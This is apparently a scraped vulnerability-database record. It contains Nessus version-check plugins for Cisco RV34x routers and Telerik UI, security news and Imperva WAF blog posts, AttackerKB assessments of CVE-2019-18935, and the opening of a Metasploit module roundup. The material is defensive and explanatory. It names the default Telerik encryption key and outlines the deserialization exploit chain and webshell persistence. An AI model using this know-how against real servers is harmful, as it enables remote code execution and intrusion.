script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(121, 149);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:cisco:small_business_rv_series_router_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:rv340_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:rv340w_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:rv345_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:rv345p_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv340\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv340w\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv345\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv345p\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_small_business_detect.nasl\", \"cisco_rv_webui_detect.nbin\");\n script_require_keys(\"Cisco/Small_Business_Router/Version\", \"Cisco/Small_Business_Router/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Small Business Series Router Firmware');\n\nif (product_info['model'] !~ \"^RV34(0W?|5P?)\")\n audit(AUDIT_HOST_NOT, 'an affected Cisco Small Business RV Series router');\n\nvar vuln_ranges = [{ 'min_ver' : '0', 'fix_ver' : '1.0.03.22' }];\n\nreporting = make_array(\n 'port' , product_info['port'],\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvy15286, CSCvy15342',\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:05:28", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {}, "published": "2020-04-24T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "href": "https://www.tenable.com/plugins/nessus/135970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135970);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-18935\");\n script_xref(name:\"IAVA\", value:\"2020-A-0219\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the remote Windows\nhost is affected by a deserialization vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability \nin the RadAsyncUpload function. This is exploitable when the encryption keys are known due to \nthe presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result \nin remote code execution. (As of 2020.1.114, a default setting prevents the exploit. \nIn 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\");\n # https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de2ce6ef\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?&_ga=2.224762457.29387225.1587722153-1707628900.1586272484#allowedcustommetadatatypes\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be6fd178\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57e10c1e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R3 2019 SP1\n(2019.3.1023) or later, and enable the type whitelisting feature of RadAsyncUpload.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-18935\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\n\nvar app_name = 'Telerik UI for ASP.NET AJAX';\nvar opt_in = FALSE;\nvar install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nvar version = install['version'];\nvar path = install['path'];\n\n# 2010.1.309 and earlier not affected \nif (ver_compare(ver:version, fix:'2010.1.309.0', strict:FALSE) <= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2020.1.114 and later have default settings available\nif (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2019.3.1023 has opt-in settings available, but not by default\nif ((ver_compare(ver:version, fix:'2019.3.1023', strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) <= 0))\n{\n opt_in = TRUE;\n}\n\nif (opt_in)\n{\n # if version is 2019.3.1023 or higher, but lower than 2020.1.114.0, \n # type whitelisting feature of RadAsyncUpload needs to be enabled manually.\n # so if we're paranoid, we add a note to the report\n # (done below) and if we're not paranoid, we audit out\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n}\n\nvar port = get_kb_item('SMB/transport');\nif (empty_or_null(port))\n port = 445;\n\nvar report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', '2019.3.1023'\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n);\n\nif (opt_in)\n report += '\\n\\n' + 'Although the type whitelisting feature of RadAsyncUpload is available for this version,' +\n '\\n' + 'we are not able to determine if this is actually enabled. Following the advisory,' +\n '\\n' + 'you should ensure that this is the case.';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "avleonov": [{"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! Last Week's Security News, August 1 - August 8.\n\n## Black Hat Pwnie Awards\n\nLast week was more quiet than normal with Black Hat USA and DEF CON security conferences. I would like to start with the Pwnie Awards, which are held annually at Black Hat. It's like an Oscar or Tony in the information security world. Pwnie Awards recognizes both excellence and incompetence. And, in general, is a very respectable, adequate and fun event.\n\nThere were [10 nominations](<https://pwnies.com/winners/>). I will note a few.\n\n * Firstly 2 nominations, which were received by the guys from Qualys. \n**Best Privilege Escalation Bug**: Baron Samedit, a 10-year-old exploit in sudo. \n**Most Under-Hyped Research**: 21Nails, 21 vulnerabilities in Exim, the Internet's most popular mail server.\n * **Best Server-Side Bug**: Orange Tsai, for his Microsoft Exchange Server ProxyLogon attack surface discoveries.\n * **Most Epic Fail**: Microsoft, for their failure to fix PrintNightmare.\n * **Best Song**: The Ransomware Song by Forrest Brazeal\n\n"You can make a fortune in Ransomware with a little bit of math \nIt's called encryption, just a little bit of math cause a conniption"\n\nand\n\n"You can blame IT or some Russian sociopath \nBut personally I blame math"\n\nBrilliant. =)\n\n## iPhone Checks Photos\n\nNow I would like to talk about [the Apple scandal](<https://thehackernews.com/2021/08/apple-to-scan-every-device-for-child.html>). They want to detect illegal photos on users' iPhones and report them to a special non-profit organization established by the US Congress. As far as I understand, report this to the police, but not directly.\n\nAnd when you hear this, you can imagine that some system component in the iPhone operating system is scanning the file system, somehow cleverly analyzing the files on the device, or uploading them to the cloud for analysis and informing officials. But this is not the case. At least for now.\n\n[Apple will check photos](<https://www.apple.com/child-safety/>) on users' device, but only\n\n 1. Photos to be uploaded to iCloud. This check will be performed using a database of known illegal photo hashes. If iCloud is off, the photos will not be checked. It looks like they don't want to see illegal content in their cloud, even for a short time. They have the right to do so.\n 2. Photos to be sent and received via Messages app. This check will be carried out using neural networks. Accordingly, if you do not use Messages app, there will be no such check. Again, the data is transferred inside the Apple cloud and they are free to do whatever they want with it.\n\nIn general, so far it does not look like some kind of total surveillance mechanism or something that could easily become such a mechanism. But it's always a good idea to think about who exactly controls your devices. Even if this someone has the best intentions. So, as I mentioned in another video, the iPhone is an odd choice if you're serious about privacy. Not only because the iPhone is the number one target for attackers, but also because of the features of the platform itself.\n\n## Evil Windows Print Server\n\nLast week there was [an interesting update to the PrintNightmare story](<https://www.bleepingcomputer.com/news/microsoft/remote-print-server-gives-anyone-windows-admin-privileges-on-a-pc/>).\n\nMimikatz creator Benjamin Delpy created an Internet-accessible print server that installs a print driver and launches a DLL with SYSTEM privileges. The current version drivers launches a SYSTEM command prompt. This new method effectively allows anyone, including threat actors, to get administrative privileges simply by installing the remote print driver. Once they gain administrative rights on the machine, they can run any command, add users, or install any software, effectively giving them complete control over the system. This technique is especially useful for threat actors who breach networks for the deployment of ransomware as it allows quick and easy access to administrative privileges on a device that helps them spread laterally through a network.[](<>)\n\n## Cisco VPN Routers Takeovers\n\nAnd finally I would like to tell about [critical vulnerabilities (CVE-2021-1609, CVE-2021-1610) in Cisco VPN routers](<https://threatpost.com/critical-cisco-bug-vpn-routers/168449/>). A critical security vulnerability in a subset of Cisco Systems\u2019 small-business VPN routers could allow a remote, unauthenticated attacker to take over a device \u2013 and researchers from Tenable said there are at least 8,800 vulnerable systems open to compromise.\n\n\u201cWhile both flaws exist due to improper validation of HTTP requests and can be exploited by sending specially crafted HTTP requests, CVE-2021-1610 can only be exploited by an authenticated attacker with root privileges,\u201d according to Tenable. \u201cSuccessful exploitation would grant an attacker the ability to gain arbitrary command execution on the vulnerable device\u2019s operating system.\u201d If patching isn\u2019t possible, users should make sure that remote web management is disabled, the firm added.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T22:18:24", "type": "avleonov", "title": "Last Week\u2019s Security News: Black Hat Pwnie Awards, iPhone Checks Photos, Evil Windows Print Server, Cisco VPN Routers Takeovers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1609", "CVE-2021-1610"], "modified": "2021-08-11T22:18:24", "id": "AVLEONOV:6751C21C8E1FE44E934028BE65F47A85", "href": "https://avleonov.com/2021/08/12/last-weeks-security-news-black-hat-pwnie-awards-iphone-checks-photos-evil-windows-print-server-cisco-vpn-routers-takeovers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-09-21T08:34:06", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 05, 2020 6:37pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**ccondon-r7** at October 13, 2020 4:47pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**gwillcox-r7** at October 20, 2020 6:59pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2019-18935", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2021-07-27T00:00:00", "id": "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "href": "https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2020-08-07T08:03:43", "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate against them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.net AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nIn order to successfully exploit the insecure deserialization vulnerability identified in CVE-2019-18935, the attacker must also exploit a pre-existing file upload vulnerability, CVE-2017-11317, which identifies the use of a default encryption key to encrypt the data in file upload requests. With this knowledge, an attacker can use the key to modify the \u201cTempTargetFolder\u201d variable in the upload request, essentially allowing file uploads to anywhere in the file system the web server has write permissions to.\n\nThe more recent vulnerability, CVE-2019-18935, details the anatomy of the upload request from RadAsyncUpload, in which the rauPostData parameter contains both a serialized configuration object, and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. The part of the parameter before the \u201c&\u201d, highlighted in blue is the serialized configuration object, and the part after, highlighted in yellow is the object's defined type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could modify the specified type to be a gadget - a class inside the scope of execution of the application - in a subsequent request, they could achieve remote code execution on the server.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June, we observed the attack pattern matching that of an exploit of CVE-2019-18935 on 645 occasions. The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. When certain conditions are met, the Cloud WAF proxies inspect the response from the server, from which they can identify known webshells, and block the subsequent requests thereafter.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>)\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen asp.net webshell\n\nThis is a simple, open source asp.net webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmdexe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code on a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T15:01:00", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2019-19781"], "modified": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-28T04:47:53", "description": "![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2020/10/metasploit-blg-3-copy.png)\n\nMetasploit keeping that developer awareness rate up.\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2020/10/telerik-fake-text-2.png)\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits 